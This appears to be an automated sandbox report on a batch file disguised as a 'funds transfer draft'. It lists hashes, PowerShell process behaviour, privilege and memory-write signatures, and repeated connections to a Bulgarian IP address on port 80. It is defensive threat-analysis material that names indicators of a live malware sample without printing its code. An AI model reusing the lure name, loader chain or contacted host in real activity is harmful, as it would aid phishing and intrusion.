Analysis Overview
SHA256
7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
Threat Level: Likely malicious
The file CBQ Funds transfer DraftUdkikspostens44.bat was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 16:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 16:13
Reported
2024-06-10 16:16
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4376 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4376 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2476 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2476 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
Network
| Country | Destination | Domain | Proto |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
Files
memory/2476-2-0x00007FF84D7C3000-0x00007FF84D7C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hifaarw.s4b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2476-3-0x000001C479950000-0x000001C479972000-memory.dmp
memory/2476-13-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-14-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-15-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-16-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-17-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 16:13
Reported
2024-06-10 16:16
Platform
win11-20240419-en
Max time kernel
147s
Max time network
143s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4732 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4732 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2556 wrote to memory of 1744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2556 wrote to memory of 1744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
Network
| Country | Destination | Domain | Proto |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
| BG | 194.59.31.187:80 | | tcp |
Files
memory/2556-2-0x00007FF830B93000-0x00007FF830B95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rywbpngc.yc2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2556-11-0x00000140F8020000-0x00000140F8042000-memory.dmp
memory/2556-12-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-13-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-14-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-15-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-16-0x00007FF830B90000-0x00007FF831652000-memory.dmp